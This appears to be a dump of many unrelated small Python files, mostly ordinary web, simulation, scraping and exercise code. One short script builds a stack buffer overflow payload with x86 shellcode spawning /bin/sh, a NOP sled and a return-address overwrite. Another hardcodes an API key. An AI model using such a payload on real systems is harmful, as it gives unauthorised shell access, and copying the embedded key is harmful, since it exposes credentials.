# "times": [397, 398, 399, 400],
# "values": [0, 5, 5, 0],
# },
# },
# }
"""
Test write_scenarios module
"""
#
# @pytest.mark.mixing_optimisation
# def test_read_optimised_variables():
# test_file = "dummy_vars_for_test.csv"
# df = write_scenarios.read_opti_outputs(test_file)
# decision_vars = write_scenarios.read_decision_vars(
# df, "france", "by_age", "six_months", "deaths"
# )
# assert decision_vars == [0.99] * 16
#
#
# @pytest.mark.mixing_optimisation
# def test_build_all_scenarios():
# test_file = "dummy_vars_for_test.csv"
# all_sc_params = write_scenarios.build_all_scenario_dicts_from_outputs(test_file)
#
# assert set(list(all_sc_params.keys())) == set(OPTI_REGIONS)
#
# assert list(all_sc_params["france"].keys()) == [1, 9]
#
# assert list(all_sc_params["france"][1].keys()) == ["time", "mobility", "parent"]
|
import paypalrestsdk
from flask import Blueprint, jsonify, request, current_app as app, redirect, url_for
from paypalrestsdk import Payment, ResourceNotFound
from backend.auth import with_user
from backend.blueprints.project import find_project_or_404
from backend.models import Donation
from backend.schemas import donation_schema
paypal_api = Blueprint('PayPalApi', __name__, url_prefix='/paypal')
@paypal_api.before_request
def setup_paypal():
# sets up paypal before the request is fired
paypalrestsdk.configure({
'mode': app.config['PAYPAL']['mode'],
'client_id': app.config['PAYPAL']['client_id'],
'client_secret': app.config['PAYPAL']['client_secret']
})
@paypal_api.route('/create-payment', methods=['POST'])
@with_user
def create_payment(current_user):
data = request.json
if not data:
return jsonify({'message': 'No data given'}), 400
if current_user is not None: # if it is None then it's an anonymous donation
data['donator_id'] = str(current_user.id)
else:
data['donator_id'] = None # make sure it's set to None, otherwise user can manipulate which user donated
# load and validate
result = donation_schema.load(data, partial=True)
if len(result.errors) > 0:
return jsonify({'errors': result.errors}), 422
project = find_project_or_404(result.data['project_id'])
payment = Payment({
'intent': 'sale',
'payer': {
'payment_method': 'paypal'
},
'redirect_urls': {
'return_url': url_for('.success', _external=True), # result.data['return_url'],
'cancel_url': url_for('.cancel', _external=True), # result.data['cancel_url'],
},
'transactions': [
{
'amount': {
'total': '%.2f' % result.data['amount'],
'currency': 'EUR',
},
'description': "Regalos Project Donation.",
'item_list': {
'items': [
{
'name': 'Project Donation',
'description': 'Donation to {project_title}'.format(
project_title=project.title),
'price': '%.2f' % result.data['amount'],
'currency': 'EUR',
'quantity': '1',
}
]
}
}
]
})
if payment.create():
result.data['paypal_payment_id'] = payment.id
donation_schema.load(result.data)
if len(result.errors) > 0:
return jsonify({'errors': result.errors}), 422
del result.data['project_id']
del result.data['donator_id']
new_donation = Donation(**result.data)
new_donation.save()
for link in payment.links:
if link.rel == 'approval_url':
return jsonify({
'message': 'Donation created!',
'approval_url': str(link.href),
'donation': donation_schema.dump(new_donation).data
})
else:
return jsonify({
'message': 'Could not create paypal payment',
'error': payment.error
}), 409
@paypal_api.route('/success') # callback from PayPal API
def success():
# TODO: set donation to success
if 'paymentId' in request.args and 'PayerID' in request.args:
try:
payment = Payment.find(request.args['paymentId']) # type: Payment
payment.execute({'payer_id': request.args['PayerID']})
donation = Donation.objects(paypal_payment_id=request.args['paymentId']).first() # type: Donation
if donation is not None:
donation.project.current_budget += donation.amount
donation.status = str(Donation.Status.SUCCESS)
donation.project.save()
donation.save()
# redirected to frontend again
return redirect('http://localhost:3000/donation/success')
except ResourceNotFound:
return redirect('http://localhost:3000/donation/failed')
else:
return jsonify({'message': 'No payment details given'}), 422
@paypal_api.route('/cancel') # callback from PayPal API
def cancel():
# TODO: paymentId is not given for cancel requests, find another way to set the donation to CANCELLED
if 'paymentId' in request.args:
donation = Donation.objects(paypal_payment_id=request.args['paymentId'])
if donation is not None:
donation.status = str(Donation.Status.CANCELLED)
donation.save()
return redirect('http://localhost:3000/donation/cancel')
|
# -*- coding: utf-8 -*-
"""6自由度機体シミュレーション用のクラス."""
import numpy as np
from numpy.linalg import inv
from math import sin, cos, pi, sqrt
import math_function as mf
class Attitude6DoF(object):
"""docstring for Quartanion.
6自由度の機体の姿勢をクォータニオンで表現するためのクラス
"""
def __init__(self):
"""初期化."""
super(Attitude6DoF, self).__init__()
self.velocityBody = np.array([0.0, 0.0, 0.0])
self.quartanion = np.array([1.0, 0.0, 0.0, 0.0])
# [q0, q1, q2, q3] q_hat = cos(theta/2) + vec_n * sin(theta / 2)
self.omegaBody = np.array([0.0, 0.0, 0.0])
self.momentOfInertia = np.array([
[0.001, 0, 0],
[0, 0.0001, 0],
[0, 0, 0.00020633122]
])
self.weight = 0.1
self.position = np.array([0.0, 0.0, 0.0])
def setQuartanionFrom(self, roll, pitch, yaw):
"""オイラー角からクオータニオンをセットする."""
self.quartanion = mf.euler2Quartanion(roll, pitch, yaw)
return self.quartanion
def rotationOfPositionVector(self, r):
"""位置ベクトルを回転クオータニオンに基づき回転させる.
クオータニオンが機体の姿勢変化を表しているなら、機体座標上の位置ベクトルを慣性座標系の位置ベクトルに変換する
"""
if len(r) != 3:
raise RuntimeError("Inputted vector must be three dimentional.")
q = self.quartanion
A11 = q[0]**2+q[1]**2-q[2]**2-q[3]**2
A12 = 2*(q[1]*q[2]-q[0]*q[3])
A13 = 2*(q[1]*q[3]+q[0]*q[2])
A21 = 2*(q[1]*q[2]+q[0]*q[3])
A22 = q[0]**2-q[1]**2+q[2]**2-q[3]**2
A23 = 2*(q[2]*q[3]-q[0]*q[1])
A31 = 2*(q[1]*q[3]-q[0]*q[2])
A32 = 2*(q[2]*q[3]+q[0]*q[1])
A33 = q[0]**2-q[1]**2-q[2]**2+q[3]**2
A = np.array([
[A11, A12, A13],
[A21, A22, A23],
[A31, A32, A33]
])
rRotated = np.dot(A, r)
return rRotated
def bodyVector2InertialVector(self, r):
"""機体座標系上のベクトルを慣性座標系の要素に分解する."""
return self.rotationOfPositionVector(r)
def inertialVector2BodyVector(self, r):
"""慣性系上のベクトルを機体座標系で表す."""
if len(r) != 3:
raise RuntimeError("Position vector must be three dimentional.")
q = self.quartanion
q0 = q[0]
q1 = q[1]
q2 = q[2]
q3 = q[3]
A = np.array([
[q0**2+q1**2-q2**2-q3**2, 2*(q1*q2+q0*q3), 2*(q1*q3-q0*q2)],
[2*(q1*q2-q0*q3), q0**2-q1**2+q2**2-q3**2, 2*(q2*q3+q0*q1)],
[2*(q1*q3+q0*q2), 2*(q2*q3-q0*q1), q0**2-q1**2-q2**2+q3**2]
])
rRotated = np.dot(A, r)
return rRotated
def calcDerivativeOfQuartanion(self, omega_inertial):
"""位置ベクトルが角速度ω(慣性系)で回転するときのクオータニオンの時間微分."""
if len(omega_inertial) != 3:
raise RuntimeError("Angular velocity must be three dimentional.")
w = omega_inertial
q = self.quartanion
w_hat = 0.5 * np.array([
[0, -w[0], -w[1], -w[2]],
[w[0], 0, -w[2], w[1]],
[w[1], w[2], 0, -w[0]],
[w[2], -w[1], w[0], 0]
])
qDot = np.dot(w_hat, q)
return qDot
def normOfQuartanion(self):
"""クオータニオンのノルムを計算する.
* 回転クオータニオンの定義上、このノルムは常に1である.
"""
q = self.quartanion
norm = sqrt(q[0]**2+q[1]**2+q[2]**2+q[3]**2)
return norm
def updateQuartanion(self, omega_body, dt):
"""機体座標系の角速度から、t+dt秒のクオータニオンを計算する."""
omega_inertial = self.rotationOfPositionVector(omega_body)
qDot = self.derivativeOfQuartanion(omega_inertial)
self.quartanion += np.dot(dt, qDot) # 積分計算
self.quartanion /= self.normOfQuartanion() # 正規化
return self.quartanion
def updateQuartanionODE(self, quartanion):
"""Scipy odeで求めたquartanionをもちいて 更新."""
self.quartanion = quartanion
self.quartanion /= self.normOfQuartanion() # 正規化
return self.quartanion
def calcDerivativeOfOmegaBody(self, moment_body):
"""機体座標系の角速度の微分をモーメントと現在の状態から求める.
式は『航空機力学入門』(加藤) (1.20)式より
"""
w = self.omegaBody
I_body = self.momentOfInertia
I_inv = inv(I_body)
M = moment_body
h = np.dot(I_body, w) # 角運動量
dwdt = np.dot(I_inv, (M - np.cross(w, h)))
print(f"CDO: {M}, {np.cross(w, h)}")
return dwdt
def updateOmegaBody(self, dt, moment_body):
"""機体座標系の角速度をモーメントから更新する."""
self.omegaBody += np.dot(dt, self.derivativeOfOmegaBody(moment_body))
return self.omegaBody
# TODO: 並進運動の運動方程式
def gravityBody(self):
"""現在の姿勢から, 重力を機体座標系の成分に分解する."""
g_inertial = np.array([0.0, 0.0, 9.81])
g_body = self.inertialVector2BodyVector(g_inertial)
return g_body * self.weight
def calcDerivativeOfVelocityBody(self, force_body):
"""機体座標系の力から機体座標系上の機体速度の時間微分を求める."""
w = self.omegaBody
vc = self.velocityBody
F = force_body
m = self.weight
dvcdt = np.dot(F, 1/m) - np.cross(w, vc)
return dvcdt
def getVelocityInertial(self):
"""慣性系の速度を取得する."""
vel_inertial = self.bodyVector2InertialVector(self.velocityBody)
return vel_inertial
def testRotation(omega):
"""クラスの動作テスト."""
att = Attitude6DoF()
nx = np.zeros(3, dtype=float)
ny = np.zeros(3, dtype=float)
nz = np.zeros(3, dtype=float)
for i in range(1000):
att.updateQuartanion(omega, 1/1000)
nx = att.rotationOfPositionVector(np.array([1, 0, 0]))
ny = att.rotationOfPositionVector(np.array([0, 1, 0]))
nz = att.rotationOfPositionVector(np.array([0, 0, 1]))
return nx, ny, nz
def testinertialVector2BodyVector():
"""ベクトルを機体座標系で正しく表現できているかのテスト."""
psi = pi/3
the = pi/6
rot = np.array([
[cos(-psi), -sin(-psi), 0],
[sin(-psi), cos(-psi), 0],
[0, 0, 1]
])
xi = np.array([cos(the), sin(the), 0.0])
xb_answer = np.dot(rot, xi)
att = Attitude6DoF()
test_q = [cos(psi/2), 0.0*sin(psi/2), 0.0*sin(psi/2), 1.0*sin(psi/2)]
att.quartanion = np.array(test_q)
xb_test = att.inertialVector2BodyVector(xi)
print(f'error: {xb_test},{xb_answer}')
print(f'error: {np.cross(xb_test,xb_answer)}')
if __name__ == '__main__':
print(testRotation([2*pi, 0, 0]))
print(testRotation([0, 2*pi, 0]))
print(testRotation([0, 0, 2*pi]))
print(testRotation([2*pi, 2*pi, 0]))
print(testRotation([0, 2*pi, 2*pi]))
print(testRotation([2*pi, 0, 2*pi]))
print(testRotation([2*pi, 2*pi, 2*pi]))
print(testinertialVector2BodyVector())
|
from django.contrib import admin
from .models import *#Paciente,Doctor
admin.site.register(Paciente)
admin.site.register(Doctor)
admin.site.register(Parmetros_directos_sensados)
admin.site.register(Parametros_Borg)
admin.site.register(Parametros_Morisky) |
def gcd(a, b):
while b != 0:
t = b
b = a % b
a = t
return a
for a in range(1, 20):
for b in range(1, 20):
print gcd(a, b), '\t',
print
|
# -*- coding: utf-8 -*-
"""
Created on Wed Dec 9 02:23:31 2020
@author: DAW
"""
import functools
def multiplicar (x,y):
print(x*y)
return x*y
numero = int(input("De que numero quieres calcular el factorial: "))
lista =range(1, numero+1)
for i in lista:
print(i , "\n")
valor= functools.reduce(multiplicar, lista)
print("\nResultado de ", numero ,"! = ", valor)
print("\n--------------\n")
lista =[1,2,3,4,5,6,7,8,9,10]
cubos = [valor**3 for valor in lista]
print("Cubos del 1 al 10: ", cubos)
divisible2 = [valor for valor in lista if valor%2==0]
print(divisible2)
def funcion(x):
return 1/x
print([funcion(i) for i in lista])
# lambda
area_cuadrado = lambda l1,l2 : l1*l2
cuadrados = [(2,2),(3,3),(4,4),(5,5)]
for i in cuadrados:
lado1 = i[0]
lado2 = i[1]
print (area_cuadrado(lado1, lado2)) |
from pygame import *
from random import randint
okkno = display.set_mode((700, 500))
display.set_caption("mona")
fon1 = transform.scale(image.load('63.jpg'), (700,500))
fon2 = transform.scale(image.load('3.jpg'), (700,500))
dio = transform.scale(image.load('93.png'), (700,500))
curfon = fon1
class boop(sprite.Sprite):
def __init__(self, img, x,y):
super().__init__()
self.image = transform.scale(image.load(img), (90,80))
self.rect = self.image.get_rect()
self.rect.x = x
self.rect.y = y
def pain(self):
okkno.blit(self.image, (self.rect.x, self.rect.y))
txt="наруто учил не сдаваться вот я и лежу"
txt2=" нажми w затем s"
font.init()
shrift=font.Font(None,30)
n=1
game = True
while game:
okkno.blit(curfon, (0,0))
okkno.blit(dio, (1,100))
t1 = shrift.render(txt, True, (255,225,225))
okkno.blit(t1, (120,370))
t2 = shrift.render(txt2, True, (255,225,225))
okkno.blit(t2, (120,400))
for i in event.get():
if i.type == QUIT:
game = False
if i.type==KEYUP:
if i.key==K_w and n==1:
txt="*Яростно проснулся*"
if i.key==K_s and n==1:
txt="*Яростно лежит*"
n=2
txt2=" нажми a затем q"
if i.key==K_a and n==2:
txt="Больше не ложусь"
if i.key==K_q and n==2:
txt="Уже встал"
n=3
curfon=fon2
txt2=" нажми w затем s"
if i.key==K_w and n==3:
txt="*Агресивно сел на кровать*"
if i.key==K_s and n==3:
txt="*Протёр глаза руками*"
n == 4
txt2=" нажми a затем q"
if i.key==K_a and n==2:
txt="Больше не ложусь"
if i.key==K_q and n==2:
txt="Уже встал"
n=3
txt2=" нажми w затем s"
display.update() |
from rest_framework import generics, status
from .serializers import UserProjectSerializer, UserEducationSerializer, UserExperienceSerializer
from rest_framework.response import Response
from authentication.models import User
from .models import UserEducation, UserProject, UserExperience
from rest_framework.views import APIView
from rest_framework.generics import ListAPIView
from rest_framework.permissions import IsAuthenticated
from django.core.exceptions import *
from rest_framework import permissions
from .permissions import *
from rest_framework.exceptions import ValidationError
from rest_framework.pagination import PageNumberPagination, LimitOffsetPagination
from rest_framework import filters
from .pagination import *
from django_filters.rest_framework import DjangoFilterBackend
# Create your views here.
class DetailsAPIView(APIView):
serializer_class = None
model_class = None
def get_obj(self,request, id):
try:
return self.model_class.objects.get(id=id)
except self.model_class.DoesNotExist:
raise ValidationError("No details found with this id")
def get(self, request, id):
obj = self.get_obj(request, id=id)
self.check_object_permissions(self.request, obj)
serializer = self.serializer_class(obj)
return Response({
'status': True,
'message': "user details",
'data': serializer.data
})
def put(self, request, id):
try:
details = self.get_obj(request, id=id)
serializer = self.serializer_class(instance=details,
data={**self.request.data, **{"user": request.user.pk}})
if serializer.is_valid(raise_exception=True):
serializer.save()
return Response({'status': True,
'message': "details updated successfully",
'data': serializer.data})
except ValidationError:
return Response(serializer.errors)
def patch(self, request, id):
try:
details = self.get_obj(request, id=id)
serializer = self.serializer_class(instance=details, partial=True,
data={**self.request.data, **{"user": request.user.pk}})
if serializer.is_valid(raise_exception=True):
serializer.save()
return Response({'status': True,
'message': " details partially updated.",
'data': serializer.data})
except ValidationError:
return Response(serializer.errors)
def delete(self, request, id):
details = self.get_obj(request, id=id)
details.delete()
return Response({"message": "user details does not exist"})
class ReadPostAPIView(generics.ListAPIView):
serializer_class = None
model_class = None
def filter_queryset(self, queryset):
for backend in list(self.filter_backends):
queryset = backend().filter_queryset(self.request, queryset, self)
return queryset
def get(self, request, *args, **kwargs):
# filter_backends = (SearchFilter,)
# details = self.model_class.objects.filter(user=request.user.pk)
# user = self.request.user
# return user.user_set.all() # queryset = self.filter_queryset(self.get_queryset())
details = self.filter_queryset(self.model_class.objects.filter(user=request.user.pk))
serializer = self.serializer_class(details, many=True)
page = self.paginate_queryset(serializer.data)
return self.get_paginated_response(page)
def post(self, request, *args, **kwargs):
try:
serializer = self.serializer_class(data={**self.request.data, **{"user": request.user.pk}})
if serializer.is_valid(raise_exception=True):
serializer.save()
return Response({'status': True,
'message': ' details added successfully',
'data': serializer.data})
except ValidationError:
return Response(serializer.errors)
except Exception as e:
return Response(str(e))
class UserProjectView(ReadPostAPIView):
serializer_class = UserProjectSerializer
model_class = UserProject
permission_classes = [permissions.IsAuthenticatedOrReadOnly,
IsOwnerOrReadOnly]
pagination_class = UserProjectViewPagination
# filter_backends = [DjangoFilterBackend]
filter_backends = (filters.SearchFilter,)
search_fields = ['title', 'description', ]
class UserProjectDetails(DetailsAPIView):
serializer_class = UserProjectSerializer
permission_classes = [IsAuthenticatedOrOwnerOrAdmin]
model_class = UserProject
class UserExperienceView(ReadPostAPIView):
serializer_class = UserExperienceSerializer
model_class = UserExperience
permission_classes = [permissions.IsAuthenticatedOrReadOnly,
IsOwnerOrReadOnly]
pagination_class = UserExperienceViewPagination
filter_backends = (filters.SearchFilter,)
search_fields = ['company_name', 'designation', ]
class UserExperienceDetails(DetailsAPIView):
serializer_class = UserExperienceSerializer
permission_classes = [IsAuthenticatedOrOwnerOrAdmin]
model_class = UserExperience
class UserEducationView(ReadPostAPIView):
serializer_class = UserEducationSerializer
model_class = UserEducation
permission_classes = [permissions.IsAuthenticatedOrReadOnly,
IsOwnerOrReadOnly,
]
pagination_class = UserEducationViewPagination
queryset = UserEducation.objects.all()
filter_backends = (filters.SearchFilter,)
search_fields = ['degree', ]
class UserEducationDetails(DetailsAPIView):
serializer_class = UserEducationSerializer
permission_classes = [IsAuthenticatedOrOwnerOrAdmin]
model_class = UserEducation
|
from django import forms
from snippets.models import Comment
class SnippetForm(forms.Form):
title=forms.CharField(label='Title',max_length=30)
content=forms.CharField(label='Content',widget=forms.Textarea)
class CommentForm(forms.ModelForm):
class Meta :
model=Comment
fields=['content']
|
# -*- codinf:utf-8 -*-
from .my_map import Map
class Simulater(object):
def __init__(self, file_name):
self.sim_map = Map(file_name)
self.reset()
def map_size(self):
return self.sim_map.map_size()
def printing(self):
self.sim_map.printing(self.player_x, self.player_y)
def end_episode(self):
x = self.player_x == self.sim_map.goal_x
y = self.player_y == self.sim_map.goal_y
return x and y
def reset(self):
self.player_x = self.sim_map.start_x
self.player_y = self.sim_map.start_y
def get_current(self):
return self.player_x, self.player_y
def __call__(self, mode):
tmp_x, tmp_y = self.player_x, self.player_y
if mode == 'UP':
tmp_y -= 1
elif mode == 'DOWN':
tmp_y += 1
elif mode == 'LEFT':
tmp_x -= 1
elif mode == 'RIGHT':
tmp_x += 1
else:
exit()
can_enter, reward = self.sim_map.get_can_enter_reward(tmp_x, tmp_y)
if can_enter:
self.player_x, self.player_y = tmp_x, tmp_y
return reward
if __name__ == '__main__':
sim = Simulater('default.txt')
sim.printing()
sim('LEFT')
sim.printing()
sim('DOWN')
sim.printing()
sim('RIGHT')
sim.printing()
sim('UP')
sim.printing()
sim('RIGHT')
sim.printing()
sim('RIGHT')
sim.printing()
sim('RIGHT')
sim.printing()
|
Version = "3.50.0"
|
#!env python3
# -*- coding: utf-8 -*-
from bs4 import BeautifulSoup
import requests
import requests_cache
import re
requests_cache.install_cache('nobel_pages',\
backend='sqlite', expire_after=7200)
def get_winner_nationality(w):
""" 受賞者の Wikipedia ページから人物情報データをスクレイピングする """
data = requests.get('http://en.wikipedia.org' + w['link'])
soup = BeautifulSoup(data.content, 'lxml')
person_data = {'name': w['name']}
attr_rows = soup.select('table.infobox tr') # ?
for tr in attr_rows: # ?
try:
attribute = tr.select_one('th').text
if attribute == 'Nationality':
person_data[attribute] = tr.select_one('td').text
except AttributeError:
pass
return person_data
def get_Nobel_winners(table):
cols = get_column_titles(table)
winners = []
for row in table.select('tr')[1:-1]:
m = re.match(row.select_one('td').text, r'^(\d+)')
year = int(re.match(r'^(\d+)', row.select_one('td').text).group(1))
for i, td in enumerate(row.select('td')[1:]):
for winner in td.select('a'):
href = winner.attrs['href']
if not href.startswith('#endnote'):
winners.append({
'year': year,
'category': cols[i]['name'],
'name': winner.text,
'link': winner.attrs['href']
})
return winners
BASE_URL = 'http://en.wikipedia.org'
# httpheader に「User-Agent」属性を追加しないと、
# Wikipedia はリクエストを拒否する
HEADERS = {'User-Agent': 'Mozilla/5.0'}
def get_Nobel_soup():
""" ノーベル賞ページの解析したタグツリーを返す """
# 有効な header を設定してノーベル賞ページにリクエストを行う
response = requests.get(
BASE_URL + '/wiki/List_of_Nobel_laureates', headers=HEADERS)
# BeautifulSoup が解析したレスポンスの内容を返す
return BeautifulSoup(response.content, "lxml")
def get_column_titles(table):
""" テーブルヘッダからノーベル賞分野を取得する """
cols = []
for th in table.select_one('tr').select('th')[1:]: # ?
link = th.select_one('a')
# 分野名と Wikipedia リンクを格納する
if link:
cols.append({'name':link.text,\
'href':link.attrs['href']})
else:
cols.append({'name':th.text, 'href':None})
return cols
soup = get_Nobel_soup()
table = soup.select_one('table.sortable.wikitable')
winners = get_Nobel_winners(table)
wdata = []
# 最初の 50 人の受賞者を調べる
for w in winners[:50]:
wdata.append(get_winner_nationality(w))
missing_nationality = []
for w in wdata:
# 「Nationality」が欠けていればリストに追加する
if not w.get('Nationality'):
missing_nationality.append(w)
# リストを出力する
print(missing_nationality)
|
import requests
import json
from os.path import dirname, abspath ,join
d = dirname(dirname(abspath(__file__))) #set files directory path
import sys
# insert at position 1 in the path, as 0 is the path of this file.
sys.path.insert(1, d)
import Log
def callApi(url, data, tokenKey):
headers = {
'Content-Type': "application/json",
'Authorization': "Bearer " + tokenKey,
'Cache-Control': "no-cache"
}
response = requests.request("POST", url, data=data.encode("utf-8"), headers=headers)
return response.text
##################### Get Token by Api Key ##########################
baseUrl = "http://api.text-mining.ir/api/"
url = baseUrl + "Token/GetToken"
querystring = {"apikey":"bddb2a1d-ed80-eb11-80ee-98ded002619b"}
response = requests.request("GET", url, params=querystring)
data = json.loads(response.text)
tokenKey = data['token']
################## Call Swear Word Detector ######################
def SwearWordTagger(text, strictness):
url = baseUrl + "TextRefinement/SwearWordTagger"
payload = "\""+text+"\""
if strictness>=3 : #Strictness should be greater than 3.
result = json.loads(callApi(url, payload, tokenKey))
#print(result) #Show result of sent text. comment it if you dont want this
if list(result.values()).count('StrongSwearWord')>=int(strictness/3) or list(result.values()).count('StrongSwearWord')+list(result.values()).count('MildSwearWord')>=int(strictness-2) or list(result.values()).count('MildSwearWord')>=int(strictness):
return True
else:
return False
else:
Log.error("Strictness should be greater than 3.", "tagger.py")
return False
|
list1 = []
list1.append(1)
list1.append(2)
list1.append(3)
list1.append(4)
list1.insert(2, 5)
print(list1) |
from unittest import TestCase
import unittest
import sys
from insert_node_binarytree import Solution
sys.path.append('../')
from leetCodeUtil import TreeNode
class TestSolution(TestCase):
def test_insertNodeCase1(self):
root = TreeNode(5)
sol = Solution()
sol.insertBinaryTreeNode(root, 3)
sol.insertBinaryTreeNode(root, 7)
sol.insertBinaryTreeNode(root, 1)
sol.insertBinaryTreeNode(root, 6)
sol.insertBinaryTreeNode(root, 9)
result1 = list(root.getBFS(root))
exp1 = [5, 3, 7, 1, 6, 9]
self.assertListEqual(result1, exp1)
if __name__ == '__main__':
unittest.main() |
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.common.by import By
from selenium.common.exceptions import WebDriverException
class Checker:
def __init__(self, driver, wait):
self.driver = driver
self.wait = wait
def save_screenshot(self, service_name, item_name):
file_name = f"{service_name}-{item_name}".replace(" ", "").lower()
self.driver.save_screenshot(f"screenshots/{file_name}.png")
|
class Solution(object):
def findMinHeightTrees(self, n, edges):
"""
:type n: int
:type edges: List[List[int]]
:rtype: List[int]
"""
if n <= 2:
return list(range(n))
graph = {i:set() for i in range(n)}
for i, j in edges:
graph[i].add(j)
graph[j].add(i)
lonely_nodes = []
next_lonely_nodes = []
for i in range(n):
if len(graph[i]) == 1:
lonely_nodes.append(i)
while len(graph) > 2:
for x in lonely_nodes:
neighbour = graph.pop(x).pop()
graph[neighbour].remove(x)
if len(graph[neighbour]) == 1:
next_lonely_nodes.append(neighbour)
lonely_nodes, next_lonely_nodes = next_lonely_nodes, []
return list(graph)
def test():
def check(n, edges, expected):
assert sorted(Solution().findMinHeightTrees(n, edges)) == sorted(expected)
check(4, [[1,0],[1,2],[1,3]], [1])
check(6, [[0, 3], [1, 3], [2, 3], [4, 3], [5, 4]], [3,4])
check(2, [[0,1]], [0,1])
check(1, [], [0])
|
# A Pythagorean triplet is a set of three natural numbers, a < b < c, for which,
# a^2 + b^2 = c^2
# For example, 3^2 + 4^2 = 9 + 16 = 25 = 5^2.
# There exists exactly one Pythagorean triplet for which a + b + c = 1000.
# Find the product abc.
def is_triplet(a, b, c):
if (a > b) or (b > c): return False
a_squared = a ** 2
b_squared = b ** 2
c_squared = c ** 2
if (a_squared + b_squared) == c_squared: return True
return False
target = 1000
for a in range(1, target):
for b in range(a, target):
for c in range(b, target):
if a + b + c > target: break
if a + b + c == target:
if is_triplet(a, b, c):
print([a, b, c])
print([a * b * c])
|
import csv
import io
import json
from rest_framework import status
from rest_framework.viewsets import ModelViewSet, ViewSet
from rest_framework.mixins import CreateModelMixin
from rest_framework.parsers import FileUploadParser
from rest_framework.response import Response
from .models import Passenger
from .serializers import PassengerSerializer, PassengerFileUploadSerializer, PassengerCSVRowSerializer
class PassengerViewSet(ModelViewSet):
queryset = Passenger.objects.all()
serializer_class = PassengerSerializer
class PassengerUploadCSVViewset(CreateModelMixin, ViewSet):
file_serializer_class = PassengerFileUploadSerializer
passenger_serializer_class = PassengerSerializer
passenger_csv_row_serializer_class = PassengerCSVRowSerializer
def create(self, request, *args, **kwargs):
serializer = self.file_serializer_class(data=request.data)
serializer.is_valid(raise_exception=True)
file = serializer.validated_data['file']
decoded_file = file.read().decode().splitlines()
reader = csv.DictReader(decoded_file)
for row in reader:
row_serializer = self.passenger_csv_row_serializer_class(data=row)
if row_serializer.is_valid():
row_serializer.create(row_serializer.data)
return Response(status=status.HTTP_204_NO_CONTENT) |
from DataPoint import DataPoint
# store and array of data so it can be easily drawn on screen
class Data:
# Populates the array of data with random data points
def populate_list(self):
for i in range(0, self.size):
self.my_list.append(DataPoint(self.min, self.max))
# min: minimum number a data point can be
# max: maximum number a data point can be
# size: how many data points the list will contain
def __init__(self, min, max, size):
self.min = min
self.max = max
self.size = size
self.my_list = []
self.populate_list()
# min: minimum number a data point can be
# max: maximum number a data point can be
# size: how many data points the list will contain
# clears the data list and repopulates with new data
def randomize(self, min, max, size):
self.min = min
self.max = max
self.size = size
self.my_list.clear()
self.populate_list()
# draws all data on the screen
def draw(self, screen):
for i in range(0, self.size):
self.my_list[i].draw(screen, i)
|
#!/usr/bin/python
import subprocess
shell_code = "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xdc\xff\xff\xff/bin/sh"
nopsled = '\x90' * 116
padding = 'A' * (446 - 116 - 32)
eip = '\x40\xf6\xff\xbf'
r = nopsled + shell_code + padding + eip
pp = '\\x'.join(x.encode('hex') for x in r)
print pp
|
#import the necessary packages
from os import path
# define the base path to the emotion dataset
BASE_PATH = r"C:\Users\schma\Documents\4th Yr\FYP\FINALE\FYP_Software201819\fer_model"
INPUT_PATH = path.sep.join([BASE_PATH, r"fer2013\datasets\fer2013.csv"])
# define the number of classes (set to 6 if you are ignoring "disgust" class
NUM_CLASSES = 6
print(INPUT_PATH)
TRAIN_HDF5 = path.sep.join([BASE_PATH, r"fer2013\hdf5\train.hdf5"])
VAL_HDF5 = path.sep.join([BASE_PATH, r"fer2013\hdf5\val.hdf5"])
TEST_HDF5 = path.sep.join([BASE_PATH, r"fer2013\hdf5\test.hdf5"])
#define the batch size
BATCH_SIZE = 128
# define the path to where output logs will be stored
OUTPUT_PATH = path.sep.join([BASE_PATH, r"fer2013\output"])
|
from rest_framework import serializers
from inventory.models import InventoryItem, Vendor, PurchaseRecord, VendorVisit
class InventoryItemSerializer(serializers.ModelSerializer):
class Meta:
model = InventoryItem
fields = '__all__'
read_only = ('created_at', 'updated_at')
class VendorSerializer(serializers.ModelSerializer):
class Meta:
model = Vendor
fields = '__all__'
class PurchaseRecordSerializer(serializers.ModelSerializer):
class Meta:
model = PurchaseRecord
fields = '__all__'
read_only = ('created_at', 'updated_at')
class VendorVisitSerializer(serializers.ModelSerializer):
class Meta:
model = VendorVisit
fields = '__all__'
read_only = ('created_at', 'updated_at')
def validate(self, data):
data['updated_by_id'] = self.context['request'].user.id
return data
|
# Generated by Django 3.0.8 on 2020-07-14 19:14
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
('profiles', '0001_initial'),
('profiles', '0004_auto_20200715_0302'),
('trips', '0001_initial'),
('reviews', '0001_initial'),
]
operations = [
migrations.AddField(
model_name='travelerreviews',
name='tripID',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.SET_DEFAULT, to='trips.Trip'),
),
migrations.AddField(
model_name='guidereviews',
name='senderID',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.SET_DEFAULT, to='profiles.Guides'),
),
migrations.AddField(
model_name='guidereviews',
name='travelerID',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.SET_DEFAULT, to='profiles.Travelers'),
),
migrations.AddField(
model_name='guidereviews',
name='tripID',
field=models.ForeignKey(default=0, on_delete=django.db.models.deletion.SET_DEFAULT, to='trips.Trip'),
),
]
|
N=int(input("输入一个整数N(N<40):"))
a=0
b=1
if(N>=40):
print("超出范围,请重新输入!")
else:
for i in range(1,N):
a,b=b,a+b
print(b)
|
import tensorflow as tf
mnist = tf.keras.datasets.mnist # Getting the mnist dataset (huge dataset of written numbers)
(train_data, train_label), (test_data, test_label) = mnist.load_data() # Splitting dataset into training and testing data
# Normalizing the data to make it easier and faster to compute
train_data = tf.keras.utils.normalize(train_data, axis=1)
test_data = tf.keras.utils.normalize(test_data, axis=1)
# Creating a basic feedforward model
model = tf.keras.models.Sequential([
tf.keras.layers.Flatten(input_shape=(28,28)), # The input layer that flattens out the 28x28 matrix for each number
tf.keras.layers.Dense(units=128, activation='relu'), # A layer where all the neurons are connected between previous and next layers, more units = more neurons and more complex
tf.keras.layers.Dense(units=128, activation='relu'), # Second hidden layer that connects to one above it
tf.keras.layers.Dense(units=10, activation='softmax') # Output layer that has 10 neurons (one for each number), softmax will scale down all activations of neurons such that all add up to 1 and gives the probability of getting a number
])
